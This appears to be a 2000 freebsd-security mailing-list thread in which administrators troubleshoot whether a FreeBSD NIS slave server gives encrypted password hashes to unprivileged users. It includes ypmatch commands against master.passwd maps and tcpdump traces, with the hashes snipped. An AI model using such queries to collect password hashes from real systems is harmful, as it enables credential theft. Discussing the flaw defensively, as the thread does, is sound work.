writes: > > I'm running ypserv as a slave and ypbind on a 4.1-S machine. > > > > Snip from ypserv(8) manpage: > > > > To make up for this, the FreeBSD version of ypserv handles the > > master.passwd.byname and master.passwd.byuid maps in a special way. > > When > > the server receives a request to access either of these two maps, it > > will > > check the TCP port from which the request originated and return an > > error > > if the port number is greater than 1023. Since only the superuser is > > al- > > lowed to bind to TCP ports with values less than 1024, the server can > > use > > this test to determine whether or not the access request came from a > > privileged user. Any requests made by non-privileged users are > > therefore > > rejected. > > > > This sounds like a wonderful thing, but why only tcp? I don't want people to > > ypcat master.passwd and get all the encrypted passwords on my system. I > > verified that a ypmatch uses udp on a port >1023 witch tcpdump: > > > > ypmatch pavalos master.passwd > > pavalos:*SNIPPED*:501:1000::0:0:pavalos:/usr/home/prm/pavalos:/bin/bash > > 06:35:27.149969 lithium.theshell.com.stun-port > lithium.theshell.com.778: > > udp 88 > > 06:35:27.150136 lithium.theshell.com.778 > lithium.theshell.com.stun-port: > > udp 108 > > > > stun-port 1994/udp #cisco serial tunnel port > > > > So my question is: Is this a configuration error, or a 'feature' (bug)? > > I was unable to recreate your problem here at home (the only place I do > use YP). Tcpdump showed that appropriate ports were used when root or > non-root made issued the request. Are you sure you weren't root or > that ypmatch wasn't setuid root on the client system? > > The correct ports are being used. My issue is that a request from a non-root user (port >1023) gives out the encrypted password. According to the manpage, any request from tcp port >1023 will be denied for master.passwd.* maps. This seems like its logic is half-correct. My question is why is is only tcp since these yp requests are over udp? Regards, Peter Avalos TheShell.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 12 7:54:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id E0E9137B422 for ; Tue, 12 Sep 2000 07:54:46 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA21378; Tue, 12 Sep 2000 07:54:18 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda21376; Tue Sep 12 07:54:17 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id HAA32272; Tue, 12 Sep 2000 07:54:17 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdY32270; Tue Sep 12 07:53:58 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e8CErva69663; Tue, 12 Sep 2000 07:53:57 -0700 (PDT) Message-Id: <200009121453.e8CErva69663@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdl69653; Tue Sep 12 07:53:02 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1-RELEASE X-Sender: cy To: Peter Avalos Cc: freebsd-security@FreeBSD.ORG Subject: Re: ypserv giving out encrypted passwords In-reply-to: Your message of "Tue, 12 Sep 2000 07:28:36 PDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 12 Sep 2000 07:53:02 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , Pet er Avalos writes: > > > On Tue, 12 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote: > > > In message , "Peter > > Avalos" > > writes: > > > I'm running ypserv as a slave and ypbind on a 4.1-S machine. > > > > > > Snip from ypserv(8) manpage: > > > > > > To make up for this, the FreeBSD version of ypserv handles the > > > master.passwd.byname and master.passwd.byuid maps in a special way. > > > When > > > the server receives a request to access either of these two maps, it > > > will > > > check the TCP port from which the request originated and return an > > > error > > > if the port number is greater than 1023. Since only the superuser i > s > > > al- > > > lowed to bind to TCP ports with values less than 1024, the server ca > n > > > use > > > this test to determine whether or not the access request came from a > > > privileged user. Any requests made by non-privileged users are > > > therefore > > > rejected. > > > > > > This sounds like a wonderful thing, but why only tcp? I don't want people > to > > > ypcat master.passwd and get all the encrypted passwords on my system. I > > > verified that a ypmatch uses udp on a port >1023 witch tcpdump: > > > > > > ypmatch pavalos master.passwd > > > pavalos:*SNIPPED*:501:1000::0:0:pavalos:/usr/home/prm/pavalos:/bin/bash > > > 06:35:27.149969 lithium.theshell.com.stun-port > lithium.theshell.com.778 > : > > > udp 88 > > > 06:35:27.150136 lithium.theshell.com.778 > lithium.theshell.com.stun-port > : > > > udp 108 > > > > > > stun-port 1994/udp #cisco serial tunnel port > > > > > > So my question is: Is this a configuration error, or a 'feature' (bug)? > > > > I was unable to recreate your problem here at home (the only place I do > > use YP). Tcpdump showed that appropriate ports were used when root or > > non-root made issued the request. Are you sure you weren't root or > > that ypmatch wasn't setuid root on the client system? > > > > > > The correct ports are being used. My issue is that a request from a > non-root user (port >1023) gives out the encrypted password. According to > the manpage, any request from tcp port >1023 will be denied for > master.passwd.* maps. This seems like its logic is half-correct. My > question is why is is only tcp since these yp requests are over udp? cwtest$ ypmatch foobar master.passwd.byname ypmatch: can't match key foobar in map master.passwd.byname. reason: YP server error cwtest$ 07:42:36.590581 cwtest.1308 > cwsys.1021: udp 92 07:42:36.615668 cwsys.1021 > cwtest.1308: udp 32 cwtest# ypmatch foobar master.passwd.byname foobar:$1$foobar's_password:62361:62361::0:0:Foobar User,,,:/home/foobar:/bin/bash cwtest# 07:43:06.646153 cwtest.657 > cwsys.1021: udp 92 07:43:06.647523 cwsys.1021 > cwtest.657: udp 128 Foobar was substituted for the real username to protect the innocent in my example above, e.g. this is real output except for my editing out the real username. From what I can tell, it works as documented on a 4.1 system. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 12 8:42:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id BEEC537B424 for ; Tue, 12 Sep 2000 08:42:22 -0700 (PDT) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA94930; Tue, 12 Sep 2000 11:42:18 -0400 (EDT) (envelope-from wollman) Date: Tue, 12 Sep 2000 11:42:18 -0400 (EDT) From: Garrett Wollman Message-Id: <200009121542.LAA94930@khavrinen.lcs.mit.edu> To: "Andrey A. Chernov" Cc: freebsd-security@FreeBSD.ORG Subject: Re: [paul@STARZETZ.DE: Breaking screen on BSD] In-Reply-To: <20000912065314.A43158@nagual.pp.ru> References: <20000912061357.A42654@nagual.pp.ru> <20000912065314.A43158@nagual.pp.ru> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Screen 3.9.8 is not vulnerable to this. By "new" I mean part of it related > to execve behaviour which is generally dangerous, not whole exploit at > once. There is nothing wrong with the behavior of execve. Only a program which was already insecure can be exploited through this technique. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 12 9:14:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from theshell.com (arsenic.theshell.com [63.236.138.5]) by hub.freebsd.org (Postfix) with SMTP id 611B137B423 for ; Tue, 12 Sep 2000 09:14:13 -0700 (PDT) Received: (qmail 32698 invoked from network); 12 Sep 2000 16:10:22 -0000 Received: from arsenic.theshell.com (HELO tequila) (root@63.236.138.5) by arsenic.theshell.com with SMTP; 12 Sep 2000 16:10:22 -0000 From: "Peter Avalos" To: "Cy Schubert - ITSD Open Systems Group" Cc: "freebsd-security@FreeBSD. ORG" Subject: RE: ypserv giving out encrypted passwords Date: Tue, 12 Sep 2000 11:12:46 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 In-Reply-To: <200009121453.e8CErva69663@cwsys.cwsent.com> Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is the way I want my server to work ;) I'm assuming that your ypserv is a master. So my next questions are: 1. Does anyone who's running ypserv as a slave get the documented results? 2. Why is there a difference between a slave server and master server when dealing with the master.passwd.* maps? Your help is appreciated, Peter Avalos TheShell.com -----BEGIN GEEK CODE BLOCK----- Version: 3.12 GCS/ED/B d-(+) s:+> a-- C++$ UBLO++++$ P+ L++++ E- W+ N+ o? K? w(++) !O M- V- PS+ PE++ Y+ PGP++ t+@ 5 X- R- tv+ b++ DI- D-- G e>+++ h-- r++ y++ ------END GEEK CODE BLOCK------ -----Original Message----- From: cy@uumail.gov.bc.ca [mailto:cy@uumail.gov.bc.ca]On Behalf Of Cy Schubert - ITSD Open Systems Group Sent: Tuesday, September 12, 2000 9:53 AM To: Peter Avalos Cc: freebsd-security@FreeBSD.ORG Subject: Re: ypserv giving out encrypted passwords In message , Pet er Avalos writes: > > > On Tue, 12 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote: > > > In message , "Peter > > Avalos" > > writes: > > > I'm running ypserv as a slave and ypbind on a 4.1-S machine. > > > > > > Snip from ypserv(8) manpage: > > > > > > To make up for this, the FreeBSD version of ypserv handles the > > > master.passwd.byname and master.passwd.byuid maps in a special way. > > > When > > > the server receives a request to access either of these two maps, it > > > will > > > check the TCP port from which the request originated and return an > > > error > > > if the port number is greater than 1023. Since only the superuser i > s > > > al- > > > lowed to bind to TCP ports with values less than 1024, the server ca > n > > > use > > > this test to determine whether or not the access request came from a > > > privileged user. Any requests made by non-privileged users are > > > therefore > > > rejected. > > > > > > This sounds like a wonderful thing, but why only tcp? I don't want people > to > > > ypcat master.passwd and get all the encrypted passwords on my system. I > > > verified that a ypmatch uses udp on a port >1023 witch tcpdump: > > > > > > ypmatch pavalos master.passwd > > > pavalos:*SNIPPED*:501:1000::0:0:pavalos:/usr/home/prm/pavalos:/bin/bash > > > 06:35:27.149969 lithium.theshell.com.stun-port > lithium.theshell.com.778 > : > > > udp 88 > > > 06:35:27.150136 lithium.theshell.com.778 > lithium.theshell.com.stun-port > : > > > udp 108 > > > > > > stun-port 1994/udp #cisco serial tunnel port > > > > > > So my question is: Is this a configuration error, or a 'feature' (bug)? > > > > I was unable to recreate your problem here at home (the only place I do > > use YP). Tcpdump showed that appropriate ports were used when root or > > non-root made issued the request. Are you sure you weren't root or > > that ypmatch wasn't setuid root on the client system? > > > > > > The correct ports are being used. My issue is that a request from a > non-root user (port >1023) gives out the encrypted password. According to > the manpage, any request from tcp port >1023 will be denied for > master.passwd.* maps. This seems like its logic is half-correct. My > question is why is is only tcp since these yp requests are over udp? cwtest$ ypmatch foobar master.passwd.byname ypmatch: can't match key foobar in map master.passwd.byname. reason: YP server error cwtest$ 07:42:36.590581 cwtest.1308 > cwsys.1021: udp 92 07:42:36.615668 cwsys.1021 > cwtest.1308: udp 32 cwtest# ypmatch foobar master.passwd.byname foobar:$1$foobar's_password:62361:62361::0:0:Foobar User,,,:/home/foobar:/bin/bash cwtest# 07:43:06.646153 cwtest.657 > cwsys.1021: udp 92 07:43:06.647523 cwsys.1021 > cwtest.657: udp 128 Foobar was substituted for the real username to protect the innocent in my example above, e.g. this is real output except for my editing out the real username. >From what I can tell, it works as documented on a 4.1 system. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 12 9:17:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from theshell.com (arsenic.theshell.com [63.236.138.5]) by hub.freebsd.org (Postfix) with SMTP id 282F537B42C for ; Tue, 12 Sep 2000 09:17:55 -0700 (PDT) Received: (qmail 889 invoked from network); 12 Sep 2000 16:17:57 -0000 Received: from arsenic.theshell.com (HELO tequila) (root@63.236.138.5) by arsenic.theshell.com with SMTP; 12 Sep 2000 16:17:57 -0000 From: "Peter Avalos" To: "David Wolfskill" Cc: "freebsd-security@FreeBSD. ORG" Subject: RE: ypserv giving out encrypted passwords Date: Tue, 12 Sep 2000 11:20:22 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 In-Reply-To: <200009121503.IAA31586@pau-amma.whistle.com> Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org |I suspect that the "encrypted password only in master.passwd.by*" only |works if it's aFreeBSD box as master. (A master constructs the maps; a |slave merely repeats what it's told.) Why? That just doesn't make sense to me. The master has to give the whole map to the slave, and the slave server should still be acting as a server. It shouldn't be dealing out the encrypted passwords to non-privileged ports. It looks like the manpage is wrong (it looks at tcp and udp), but it also looks like there's a bug when ypserv is acting as a slave server. Regards, Peter Avalos TheShell.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 12 9:32:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (Postfix) with ESMTP id 6DFE337B422 for ; Tue, 12 Sep 2000 09:32:08 -0700 (PDT) Received: (from smap@localhost) by whistle.com (8.10.0/8.10.0) id e8CGW6M22179; Tue, 12 Sep 2000 09:32:06 -0700 (PDT) Received: from pau-amma.whistle.com( 207.76.205.64) by whistle.com via smap (V2.0) id xma022175; Tue, 12 Sep 2000 09:31:47 -0700 Received: (from dhw@localhost) by pau-amma.whistle.com (8.9.3/8.9.3) id JAA32038; Tue, 12 Sep 2000 09:31:47 -0700 (PDT) (envelope-from dhw) Date: Tue, 12 Sep 2000 09:31:47 -0700 (PDT) From: David Wolfskill Message-Id: <200009121631.JAA32038@pau-amma.whistle.com> To: dhw@whistle.com, pavalos@theshell.com Subject: RE: ypserv giving out encrypted passwords Cc: freebsd-security@FreeBSD.ORG In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >From: "Peter Avalos" >Date: Tue, 12 Sep 2000 11:20:22 -0500 >|I suspect that the "encrypted password only in master.passwd.by*" only >|works if it's aFreeBSD box as master. (A master constructs the maps; a >|slave merely repeats what it's told.) [I should note that the above parenthetical remark is speculation on my part, to some extent, as I haven't reviewed the code in question. But since such things as gthe "UNSECURE = 'TRUE'" specification go in the /var/yp/Makefile on the *master*, it makes sense to me. dhw] >Why? That just doesn't make sense to me. The master has to give the whole >map to the slave, and the slave server should still be acting as a server. The slave is acting as a server: in response to a client query, it provides a copy or excerpt of the map it has. But it doesn't create the map from scratch; it gets the maps from its master. >It shouldn't be dealing out the encrypted passwords to non-privileged ports. NIS doesn't really deal (much) in terms of what the fields are intended to mean; it's basically as simple, moderately-distributed, name-value lookup service. For example, if I request a lookup of "dhw" in the "passwd.byname" map, what comes back is a "record". That the "record" is broken up into separate fields is an artifact of what the client chooses to do with the resulting information; NIS couldn't care less. (The split-out of the password stuff is handled by the Makefile, so the resulting maps get created with the proper contents, by the master server during the "make" process. That has next to nothing to do with the NIS client-server interaction.) >It looks like the manpage is wrong (it looks at tcp and udp), but it also >looks like there's a bug when ypserv is acting as a slave server. That (latter) depends on the master server. It's likely that the man page is (at least) confusing in such a case. Cheers, david -- David Wolfskill dhw@whistle.com UNIX System Administrator Desk: 650/577-7158 TIE: 8/499-7158 Cell: 650/759-0823 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 12 10:23:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id B970637B424 for ; Tue, 12 Sep 2000 10:23:20 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA21972; Tue, 12 Sep 2000 10:22:43 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda21967; Tue Sep 12 10:22:25 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id KAA33350; Tue, 12 Sep 2000 10:22:25 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdi33348; Tue Sep 12 10:22:03 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e8CHM3070153; Tue, 12 Sep 2000 10:22:03 -0700 (PDT) Message-Id: <200009121722.e8CHM3070153@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdo70149; Tue Sep 12 10:22:02 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1-RELEASE X-Sender: cy To: "Peter Avalos" Cc: "Cy Schubert - ITSD Open Systems Group" , "freebsd-security@FreeBSD. ORG" Subject: Re: ypserv giving out encrypted passwords In-reply-to: Your message of "Tue, 12 Sep 2000 11:12:46 CDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 12 Sep 2000 10:22:02 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , "Peter Avalos" writes: > This is the way I want my server to work ;) I'm assuming that your ypserv is > a master. So my next questions are: > > 1. Does anyone who's running ypserv as a slave get the documented results? > > 2. Why is there a difference between a slave server and master server when > dealing with the master.passwd.* maps? > > > Your help is appreciated, My only YP installation is at home. Sorry, I have no slave. I don't use YP at work. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC > > Peter Avalos > TheShell.com > > -----BEGIN GEEK CODE BLOCK----- > Version: 3.12 > GCS/ED/B d-(+) s:+> a-- C++$ UBLO++++$ P+ L++++ E- W+ N+ o? K? w(++) !O M- > V- PS+ PE++ Y+ PGP++ t+@ 5 X- R- tv+ b++ DI- D-- G e>+++ h-- r++ y++ > ------END GEEK CODE BLOCK------ > > -----Original Message----- > From: cy@uumail.gov.bc.ca [mailto:cy@uumail.gov.bc.ca]On Behalf Of Cy > Schubert - ITSD Open Systems Group > Sent: Tuesday, September 12, 2000 9:53 AM > To: Peter Avalos > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: ypserv giving out encrypted passwords > > > In message m>, Pet > er Avalos writes: > > > > > > On Tue, 12 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote: > > > > > In message , "Peter > > > Avalos" > > > writes: > > > > I'm running ypserv as a slave and ypbind on a 4.1-S machine. > > > > > > > > Snip from ypserv(8) manpage: > > > > > > > > To make up for this, the FreeBSD version of ypserv handles the > > > > master.passwd.byname and master.passwd.byuid maps in a special > way. > > > > When > > > > the server receives a request to access either of these two maps, > it > > > > will > > > > check the TCP port from which the request originated and return > an > > > > error > > > > if the port number is greater than 1023. Since only the > superuser i > > s > > > > al- > > > > lowed to bind to TCP ports with values less than 1024, the server > ca > > n > > > > use > > > > this test to determine whether or not the access request came > from a > > > > privileged user. Any requests made by non-privileged users are > > > > therefore > > > > rejected. > > > > > > > > This sounds like a wonderful thing, but why only tcp? I don't want > people > > to > > > > ypcat master.passwd and get all the encrypted passwords on my system. > I > > > > verified that a ypmatch uses udp on a port >1023 witch tcpdump: > > > > > > > > ypmatch pavalos master.passwd > > > > > pavalos:*SNIPPED*:501:1000::0:0:pavalos:/usr/home/prm/pavalos:/bin/bash > > > > 06:35:27.149969 lithium.theshell.com.stun-port > > lithium.theshell.com.778 > > : > > > > udp 88 > > > > 06:35:27.150136 lithium.theshell.com.778 > > lithium.theshell.com.stun-port > > : > > > > udp 108 > > > > > > > > stun-port 1994/udp #cisco serial tunnel port > > > > > > > > So my question is: Is this a configuration error, or a 'feature' > (bug)? > > > > > > I was unable to recreate your problem here at home (the only place I do > > > use YP). Tcpdump showed that appropriate ports were used when root or > > > non-root made issued the request. Are you sure you weren't root or > > > that ypmatch wasn't setuid root on the client system? > > > > > > > > > > The correct ports are being used. My issue is that a request from a > > non-root user (port >1023) gives out the encrypted password. According to > > the manpage, any request from tcp port >1023 will be denied for > > master.passwd.* maps. This seems like its logic is half-correct. My > > question is why is is only tcp since these yp requests are over udp? > > cwtest$ ypmatch foobar master.passwd.byname > ypmatch: can't match key foobar in map master.passwd.byname. reason: YP > server error > cwtest$ > > 07:42:36.590581 cwtest.1308 > cwsys.1021: udp 92 > 07:42:36.615668 cwsys.1021 > cwtest.1308: udp 32 > > cwtest# ypmatch foobar master.passwd.byname > foobar:$1$foobar's_password:62361:62361::0:0:Foobar > User,,,:/home/foobar:/bin/bash > cwtest# > > 07:43:06.646153 cwtest.657 > cwsys.1021: udp 92 > 07:43:06.647523 cwsys.1021 > cwtest.657: udp 128 > > Foobar was substituted for the real username to protect the innocent in > my example above, e.g. this is real output except for my editing out > the real username. > > >From what I can tell, it works as documented on a 4.1 system. > > > Regards, Phone: (250)387-8437 > Cy Schubert Fax: (250)387-5766 > Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca > Open Systems Group, ITSD, ISTA > Province of BC > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 12 11:32:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by hub.freebsd.org (Postfix) with ESMTP id 7B99637B422 for ; Tue, 12 Sep 2000 11:32:50 -0700 (PDT) Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.11.0/8.11.0) id e8CIWdO05060; Tue, 12 Sep 2000 11:32:39 -0700 Date: Tue, 12 Sep 2000 11:32:39 -0700 From: Brooks Davis To: Peter Avalos Cc: David Wolfskill , "freebsd-security@FreeBSD. ORG" Subject: Re: ypserv giving out encrypted passwords Message-ID: <20000912113239.B31617@Odin.AC.HMC.Edu> References: <200009121503.IAA31586@pau-amma.whistle.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: ; from pavalos@theshell.com on Tue, Sep 12, 2000 at 11:20:22AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Sep 12, 2000 at 11:20:22AM -0500, Peter Avalos wrote: > Why? That just doesn't make sense to me. The master has to give the whole > map to the slave, and the slave server should still be acting as a server. > It shouldn't be dealing out the encrypted passwords to non-privileged ports. You're mistaking NIS for an inteligent protocol. ;-) NIS does one thing and one thing only. Given the name of a domain and the name of a map within that name it returns one or more request name value pairs from that map. It does nothing else and has no symantic knowledge of those name value pairs. FreeBSD appears to have a hack to implement shadow passwd support, but it's definatly a non-standard hack. The security model for NIS consists of two things being able to connect to the server and knowing the domain. That's it. -- Brooks -- Any statement of the form "X is the one, true Y" is FALSE. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 12 17:48:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from minotaur.labyrinth.net.au (minotaur.labyrinth.net.au [203.9.148.2]) by hub.freebsd.org (Postfix) with ESMTP id 7396737B423 for ; Tue, 12 Sep 2000 17:48:24 -0700 (PDT) Received: from cows (sean.lab.office.labyrinth.net.au [203.9.148.76]) by minotaur.labyrinth.net.au (8.9.3/8.9.3) with SMTP id LAA85678; Wed, 13 Sep 2000 11:48:05 +1100 (EST) Message-ID: <009d01c01d1c$47795e40$4c9409cb@labyrinth.net.au> From: "Sean Winn" To: "Peter Avalos" , "Cy Schubert - ITSD Open Systems Group" Cc: "freebsd-security@FreeBSD. ORG" References: Subject: Re: ypserv giving out encrypted passwords Date: Wed, 13 Sep 2000 11:48:05 +1100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 11:45 sean@sentinel [~] ypwhich typhoon.sub.net.au 11:45 sean@sentinel [~] uname -a FreeBSD sentinel.sub.net.au 3.4-STABLE FreeBSD 3.4-STABLE #0: Fri Jun 2 15:53:3 9 EST 2000 sean@sentinel.sub.net.au:/usr/src/sys/compile/SENTINEL i386 11:45 sean@sentinel [~] ypmatch sean master.passwd ypmatch: can't match key sean in map master.passwd.byname. reason: YP server error 11:45:46.981753 sentinel.sub.net.au.1318 > typhoon.sub.net.au.1021: udp 84 11:45:46.982734 typhoon.sub.net.au.1021 > sentinel.sub.net.au.1318: udp 32 typhoon is a slave server. ----- Original Message ----- From: "Peter Avalos" To: "Cy Schubert - ITSD Open Systems Group" Cc: "freebsd-security@FreeBSD. ORG" Sent: Wednesday, September 13, 2000 3:12 AM Subject: RE: ypserv giving out encrypted passwords > This is the way I want my server to work ;) I'm assuming that your ypserv is > a master. So my next questions are: > > 1. Does anyone who's running ypserv as a slave get the documented results? > > 2. Why is there a difference between a slave server and master server when > dealing with the master.passwd.* maps? > > > Your help is appreciated, > > Peter Avalos > TheShell.com > > -----BEGIN GEEK CODE BLOCK----- > Version: 3.12 > GCS/ED/B d-(+) s:+> a-- C++$ UBLO++++$ P+ L++++ E- W+ N+ o? K? w(++) !O M- > V- PS+ PE++ Y+ PGP++ t+@ 5 X- R- tv+ b++ DI- D-- G e>+++ h-- r++ y++ > ------END GEEK CODE BLOCK------ > > -----Original Message----- > From: cy@uumail.gov.bc.ca [mailto:cy@uumail.gov.bc.ca]On Behalf Of Cy > Schubert - ITSD Open Systems Group > Sent: Tuesday, September 12, 2000 9:53 AM > To: Peter Avalos > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: ypserv giving out encrypted passwords > > > In message m>, Pet > er Avalos writes: > > > > > > On Tue, 12 Sep 2000, Cy Schubert - ITSD Open Systems Group wrote: > > > > > In message , "Peter > > > Avalos" > > > writes: > > > > I'm running ypserv as a slave and ypbind on a 4.1-S machine. > > > > > > > > Snip from ypserv(8) manpage: > > > > > > > > To make up for this, the FreeBSD version of ypserv handles the > > > > master.passwd.byname and master.passwd.byuid maps in a special > way. > > > > When > > > > the server receives a request to access either of these two maps, > it > > > > will > > > > check the TCP port from which the request originated and return > an > > > > error > > > > if the port number is greater than 1023. Since only the > superuser i > > s > > > > al- > > > > lowed to bind to TCP ports with values less than 1024, the server > ca > > n > > > > use > > > > this test to determine whether or not the access request came > from a > > > > privileged user. Any requests made by non-privileged users are > > > > therefore > > > > rejected. > > > > > > > > This sounds like a wonderful thing, but why only tcp? I don't want > people > > to > > > > ypcat master.passwd and get all the encrypted passwords on my system. > I > > > > verified that a ypmatch uses udp on a port >1023 witch tcpdump: > > > > > > > > ypmatch pavalos master.passwd > > > > > pavalos:*SNIPPED*:501:1000::0:0:pavalos:/usr/home/prm/pavalos:/bin/bash > > > > 06:35:27.149969 lithium.theshell.com.stun-port > > lithium.theshell.com.778 > > : > > > > udp 88 > > > > 06:35:27.150136 lithium.theshell.com.778 > > lithium.theshell.com.stun-port > > : > > > > udp 108 > > > > > > > > stun-port 1994/udp #cisco serial tunnel port > > > > > > > > So my question is: Is this a configuration error, or a 'feature' > (bug)? > > > > > > I was unable to recreate your problem here at home (the only place I do > > > use YP). Tcpdump showed that appropriate ports were used when root or > > > non-root made issued the request. Are you sure you weren't root or > > > that ypmatch wasn't setuid root on the client system? > > > > > > > > > > The correct ports are being used. My issue is that a request from a > > non-root user (port >1023) gives out the encrypted password. According to > > the manpage, any request from tcp port >1023 will be denied for > > master.passwd.* maps. This seems like its logic is half-correct. My > > question is why is is only tcp since these yp requests are over udp? > > cwtest$ ypmatch foobar master.passwd.byname > ypmatch: can't match key foobar in map master.passwd.byname. reason: YP > server error > cwtest$ > > 07:42:36.590581 cwtest.1308 > cwsys.1021: udp 92 > 07:42:36.615668 cwsys.1021 > cwtest.1308: udp 32 > > cwtest# ypmatch foobar master.passwd.byname > foobar:$1$foobar's_password:62361:62361::0:0:Foobar > User,,,:/home/foobar:/bin/bash > cwtest# > > 07:43:06.646153 cwtest.657 > cwsys.1021: udp 92 > 07:43:06.647523 cwsys.1021 > cwtest.657: udp 128 > > Foobar was substituted for the real username to protect the innocent in > my example above, e.g. this is real output except for my editing out > the real username. > > >From what I can tell, it works as documented on a 4.1 system. > > > Regards, Phone: (250)387-8437 > Cy Schubert Fax: (250)387-5766 